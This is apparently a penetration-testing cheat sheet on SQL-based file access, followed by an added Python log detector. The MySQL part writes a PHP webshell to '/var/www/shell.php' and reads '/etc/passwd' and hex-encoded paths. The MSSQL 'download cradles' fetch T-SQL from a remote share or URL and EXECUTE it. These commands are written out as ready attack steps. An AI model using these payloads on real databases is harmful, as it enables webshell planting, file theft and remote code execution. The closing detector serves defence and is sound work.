Reading and writing files aids in data gathering and data exfiltration. Many methods involve writing to the webroot, which allows a webshell to be executed or data to be exfiltrated over port 80/443.

## MySQL

* Requires a privileged user

| Description | Statement |
|---|---|
| Dump to file | `SELECT * FROM mytable INTO dumpfile '/tmp/somefile'` |
| Write PHP shell to file | `SELECT 'system($_GET['c']); ?>' INTO OUTFILE '/var/www/shell.php'` |
| Read file | `SELECT LOAD_FILE('/etc/passwd')` |
| Read obfuscated file | `SELECT LOAD_FILE(0x633A5C626F6F742E696E69)` (reads c:\boot.ini) |
| File privileges (mysql.user) | `SELECT file_priv FROM mysql.user WHERE user = 'netspi'` |
| File privileges (information_schema) | `SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%'` |
## Oracle

Sometimes UTL_FILE can be used. Check that the following is non-null:

```sql
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
```

If Java is installed (not available in Oracle Express), it can also be used to read and write files.
## MSSQL

* Requires a privileged user

**Download Cradle - Bulk Insert - TSQL**

```sql
-- Bulk Insert - Download Cradle Example
-- Setup variables
DECLARE @cmd varchar(8000)
-- Create temp table
CREATE TABLE #file (content nvarchar(4000));
-- Read file into temp table - web server must support PROPFIND
BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt';
-- Select contents of file
SELECT @cmd = content FROM #file
-- Display command
SELECT @cmd
-- Run command
EXECUTE(@cmd)
-- Drop the temp table
DROP TABLE #file
```

**Download Cradle OAP 1 - SQL**

```sql
-- OLE Automation Procedure - Download Cradle Example
-- Does not require a table, but can't handle larger payloads
-- Note: This also works with UNC paths \\ip\file.txt
-- Note: This also works with WebDAV paths \\ip@80\file.txt
--       However, the target web server needs to support PROPFIND.
-- Setup variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @handle int
DECLARE @Command varchar(8000)
-- Set target URL containing TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'
-- Setup namespace
EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT
-- Call the Open method to set up the HTTP request
EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'
-- Call the Send method to send the HTTP GET request
EXEC @handle=sp_OAMethod @WinHTTP,'Send'
-- Capture the HTTP response content
EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out
-- Destroy the object
EXEC @handle=sp_OADestroy @WinHTTP
-- Display command
SELECT @Command
-- Run command
EXECUTE (@Command)
```

**Download Cradle OAP 2 - TSQL**

```sql
-- OLE Automation Procedure - Download Cradle Example - Option 2
-- Can handle larger payloads, but requires a table
-- Note: This also works with UNC paths \\ip\file.txt
-- Note: This also works with WebDAV paths \\ip@80\file.txt
--       However, the target web server needs to support PROPFIND.
-- Setup variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @Handle int
DECLARE @Command varchar(8000)
-- Set target URL containing TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'
-- Create temp table to store downloaded string
CREATE TABLE #text(html text NULL)
-- Setup namespace
EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT
-- Call the Open method to configure the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'
-- Call the Send method to send the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP,'Send'
-- Capture the HTTP response content
INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'
-- Destroy the object
EXEC @Handle=sp_OADestroy @WinHTTP
-- Display the command
SELECT @Command = html from #text
SELECT @Command
-- Run the command
EXECUTE (@Command)
-- Remove temp table
DROP TABLE #text
```

**Read file - TSQL**

* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql
* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql
* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx
* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql
* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql
* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql

**Write file - TSQL**

* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql
* https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql
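As an added example (not from the original page or the PowerUpSQL project), the following Python detector flags the file read/write primitives catalogued above in MySQL and MSSQL query-audit logs, decodes hex-literal paths like the `LOAD_FILE(0x...)` case, and marks the remote-fetch-plus-execute combination that characterises the download cradles. The tab-separated log format, user names and sample statements are constructed for this example.

```python
import re

# Signatures for the file primitives catalogued on this page (MySQL and MSSQL).
SIGNATURES = {
    "mysql_read_file":      re.compile(r"\bLOAD_FILE\s*\(", re.I),
    "mysql_write_file":     re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I),
    "mssql_bulk_insert":    re.compile(r"\bBULK\s+INSERT\b", re.I),
    "mssql_openrowset":     re.compile(r"\bOPEN(?:ROWSET|DATASOURCE)\s*\(", re.I),
    "mssql_ole_automation": re.compile(r"\bsp_OA(?:Create|Method|GetProperty|Destroy)\b", re.I),
    "mssql_exec_variable":  re.compile(r"\bEXEC(?:UTE)?\s*\(\s*@\w+\s*\)", re.I),
}
# A UNC/WebDAV share (\\host[@port]\...) or a URL means content is pulled from another host.
REMOTE_SOURCE = re.compile(r"\\\\[\w.\-]+(?:@\w+)?\\|https?://", re.I)
HEX_LITERAL = re.compile(r"0x(?:[0-9A-Fa-f]{2}){4,}")

def decode_hex_literal(token):
    """Decode a MySQL hex literal such as 0x633A5C... to text; None if not ASCII."""
    try:
        return bytes.fromhex(token[2:]).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(statement):
    """Report which file primitives a statement uses, plus cradle/obfuscation context."""
    techniques = sorted(name for name, rx in SIGNATURES.items() if rx.search(statement))
    remote = bool(REMOTE_SOURCE.search(statement))
    decoded = [decode_hex_literal(m.group(0)) for m in HEX_LITERAL.finditer(statement)]
    return {
        "techniques": techniques,
        "remote_source": remote,
        # remote fetch combined with executing a variable = download-cradle pattern
        "download_cradle": remote and "mssql_exec_variable" in techniques,
        "decoded_hex_paths": [p for p in decoded if p],
    }

def scan_log(lines):
    """Return (user, statement, findings) for 'user<TAB>statement' lines hitting a signature."""
    rows = [(line.partition("\t")[0], line.partition("\t")[2]) for line in lines]
    return [(u, s, f) for u, s in rows for f in [classify(s)] if f["techniques"]]

# Constructed sample audit log for this example (not real traffic).
SAMPLE_LOG = [
    "app\tSELECT name FROM products WHERE id = 5",
    "netspi\tSELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
    "netspi\tBULK INSERT #file FROM '\\\\sharepoint.acme.com@SSL\\Path\\to\\file.txt'; "
    "SELECT @cmd = content FROM #file; EXECUTE(@cmd)",
]
```

Running `scan_log(SAMPLE_LOG)` skips the benign query, reports the hex-obfuscated read as `c:\boot.ini`, and marks the bulk-insert line as a download cradle because it fetches from a WebDAV share and then executes the result.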